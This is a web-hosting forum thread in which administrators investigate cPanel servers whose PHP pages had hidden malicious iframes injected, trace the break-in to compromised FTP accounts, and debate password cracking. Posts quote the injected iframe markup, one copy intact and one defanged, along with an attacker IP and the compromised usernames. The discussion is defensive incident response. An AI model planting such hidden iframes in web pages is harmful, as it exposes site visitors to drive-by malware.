stelaartois.ru - cpanel server hacked ?

forlinuxsupport

Well-Known Member
PartnerNOC
Dec 22, 2004
386
0
166
cPanel Access Level
Root Administrator
Hi

I have foudn thsi on one of my cpanel servers and googling it has come up with 2 other servers it has happened on. One of the common things is they are all CPANEL servers.

I have inserted spaces in the words , in case someone clicks on it :)

< I F R A M E name='StatPage' src='h t t p : / / s t e l a a r t o i s . r u /index2.php' w i d t h=5 h e i g h t=5
s t y l e='display:none'></IFRAME>

It seems to really slow the servr down.. some type of doss attack when running it ?

Anyone else had this issue. I'm busy investigating it, so I will post back here is I find anything.

Just found out, one server chnaged the root password and that stopped them getting on. I looked in logs and cant find anyone sshing on.. hmm... puzzling.

Regards
Andy
 

Kelmas

Well-Known Member
Nov 6, 2006
121
0
166
Lithuania
That is an explot that hit many HostGator servers some time ago and that iframe contained a serious virus. I suggest backing up /home/ dirs and reinstall servers.

The problem is in PHP rendering (automatically ads iframe to all generated pages) and spreads due to IE exploit. Other browsers does not show this.
 

forlinuxsupport

Well-Known Member
PartnerNOC
Dec 22, 2004
386
0
166
cPanel Access Level
Root Administrator
Hey guys

I know the exploit you are talking about and I ran the cpanel script and did the force update when that happened (about a month or so ago).

So I'm puzzled as to how they are able to do it now...

I'm hoping its not a new cpanel exploit. apache Logs have rotated (nice one cpanel) so I cant even look back in those.

Regards
Andy
 

AndyReed

Well-Known Member
PartnerNOC
May 29, 2004
2,217
4
193
Minneapolis, MN
I have found this on one of my cpanel servers and googling it has come up with 2 other servers it has happened on. One of the common things is they are all CPANEL servers.

I have inserted spaces in the words , in case someone clicks on it :)

< I F R A M E name='StatPage' src='h t t p : / / s t e l a a r t o i s . r u /index2.php' w i d t h=5 h e i g h t=5
s t y l e='display:none'></IFRAME>

It seems to really slow the servr down.. some type of doss attack when running it ?

Anyone else had this issue. I'm busy investigating it, so I will post back here is I find anything.

Just found out, one server chnaged the root password and that stopped them getting on. I looked in logs and cant find anyone sshing on.. hmm... puzzling.
Just in case, these are few of the symptoms of a server that has been compromised:

  1. Applications that suddenly don't respond as expected.
  2. Additional user accounts that you can't account for (these may be made to look like system accounts)
  3. New files or directories with unusual names.
  4. Additional network traffic that can't be traced to a particular process
  5. E-Mail from a security department implying that your server has been port scanning or sending malicious network traffic
  6. Server running significantly slower

If you are experiencing any of these symptoms, your server has been compromised and the best solution is OS reload.
 

JamesSmith

Well-Known Member
Sep 17, 2003
185
0
166
UK, Luton
Some of our servers are suffering the same fate, despite everything being up to date. Some web sites on some servers have the following added to their index.php pages:

Code:
<iframe src="http://isecurepages.net/out.php?s_id=11" width=0 height=0></iframe>
I contacted cPanel when we first noticed the problem (right at the time of the major cPanel exploit ... coincidence? I don’t think so) but they refuse to help, with the usual "we do not provide server management". What they don’t seem to grasp is that I'm not after server management, I'm after assistance with a potential problem caused by their insecure software!
 

AndyReed

Well-Known Member
PartnerNOC
May 29, 2004
2,217
4
193
Minneapolis, MN
I contacted cPanel when we first noticed the problem (right at the time of the major cPanel exploit ... coincidence? I don’t think so) but they refuse to help, with the usual "we do not provide server management". What they don’t seem to grasp is that I'm not after server management, I'm after assistance with a potential problem caused by their insecure software!
Unless you can prove that your server was hacked because of their control panel, otherwise you don't have a case agianst them. It is in your best interest to take all measures to harden and secure your server. Remember that the cPanel offers web hosting software that automates the intricate workings of web hosting servers. Compared to other control panels, the cPanel is the most secure and robust control panel.
 

Kelmas

Well-Known Member
Nov 6, 2006
121
0
166
Lithuania
I contacted cPanel when we first noticed the problem (right at the time of the major cPanel exploit ... coincidence? I don’t think so) but they refuse to help, with the usual "we do not provide server management". What they don’t seem to grasp is that I'm not after server management, I'm after assistance with a potential problem caused by their insecure software!
You can try to search for information at HostGator Forums, guys had a hard time, but solved similar attack.
 

JamesSmith

Well-Known Member
Sep 17, 2003
185
0
166
UK, Luton
Unless you can prove that your server was hacked because of their control panel, otherwise you don't have a case agianst them. It is in your best interest to take all measures to harden and secure your server. Remember that the cPanel offers web hosting software that automates the intricate workings of web hosting servers. Compared to other control panels, the cPanel is the most secure and robust control panel.
I have no doubt that it was because of the recent cPanel exploit as its occurred and is occurring on a number of other hosts.

It will be interesting to see how this progresses and if the impact of it is felt further, maybe when more people are affected will someone take notice.
 
D

dfltech

Guest
I was googling and found some links that had this problem as well..

Now what concerned me was they all used cPanel server and they all are effected in late November. So it is definately not the last exploit.

I hope that it is not the cPanel again..!!!
 

JamesSmith

Well-Known Member
Sep 17, 2003
185
0
166
UK, Luton
isecurepage code started to appear for us about a week before the cPanel exploit was announced by cPanel.

I think we need some clarification from hostgator if their problem was the same and the line of code that was added to peoples sites - If we can see a pattern, then there’s still a problem that cPanel needs to do something about.

The problem is, we dont know how this line of code is being added to sites.
 

forlinuxsupport

Well-Known Member
PartnerNOC
Dec 22, 2004
386
0
166
cPanel Access Level
Root Administrator
yes.. got it :)

They had guessed 3 users ftp usernames and passwords on the server.

Not sure how they would get those usernames.

The ip he came from was - 209.160.65.6

The usernames were.. so not easy to guess
lookwhat
paulslee
yeschef

I'm wondering if there is more too this.. and how they got thoese detials ...

Might have exploited the server earlier and downloaded all usernames and passwords..

Cheers
Andy
 
D

dfltech

Guest
Actually late September.
No its late November... and by the way I have a friend whos site had the same iframe hack yesterday.. now he has a VPS with very few sites and cPanel.. but all other sites were intact.. So this should not have any thing to do with cPanel I suppose.

May be a PHP application or a function...

And regarding hostgator.. their issues was at the same time when cPanel had an exploit.. I have gone through their forums but did not fine any recent complains about the iframe hack.
 
Last edited by a moderator:

Kelmas

Well-Known Member
Nov 6, 2006
121
0
166
Lithuania
I have an account at Hostgator and clearly know that iframe issue was IN SEPTEMBER.

Now getting back to the topic... It is not difficult to steal FTP logins as they are sent unencrypted. I can say very rare uses secure FTP.
 

JamesSmith

Well-Known Member
Sep 17, 2003
185
0
166
UK, Luton
I don’t think the passwords are being captured by anyone listening on the server or between the server + user or even on the users system. It’s more likely they gained the passwd file off the server and ran something like jack the ripper to crack the passwords.

We've seen the same IP on all of our servers that are affected connect to the server with many different usernames and login successfully. We're currently investigating if it’s feasible to simply download the passwd file off the server with some PHP coding and then attempt to crack the passwords.
 

chirpy

Well-Known Member
Verifed Vendor
Jun 15, 2002
13,437
34
473
Go on, have a guess
On most modern linux distros passwords are not stored in //etc/passwd, they're in /etc/shadow and to get at those you nearly always need a root exploit (unless your permissions on that file are FUBAR'd). I'd guess at a simple password guesser/weak password.

Usually to capture passwords in the clear requires, again, either a root exploit on the server itself, or a packet sniffer on the same subnet as you on a seperate server that has been root comrpomised. It's unlikely, but possible.
 

JamesSmith

Well-Known Member
Sep 17, 2003
185
0
166
UK, Luton
On one server with 850 accounts, we believe 63 have been accessed and affected by this code change.

So yes, it could be that all the users were using relatively weak passwords and they were guessed, along with the usernames ... or someone has been able to gain other sensetive information, as you suggest. But there is nothing sniffing on our network or the individual servers to do this. So it means cPanel has a problem or something else gathered information before cPanel patched it.
 

carluk

Well-Known Member
Sep 2, 2003
161
0
166
Get John the ripper to test your users passwords.
 
Last edited: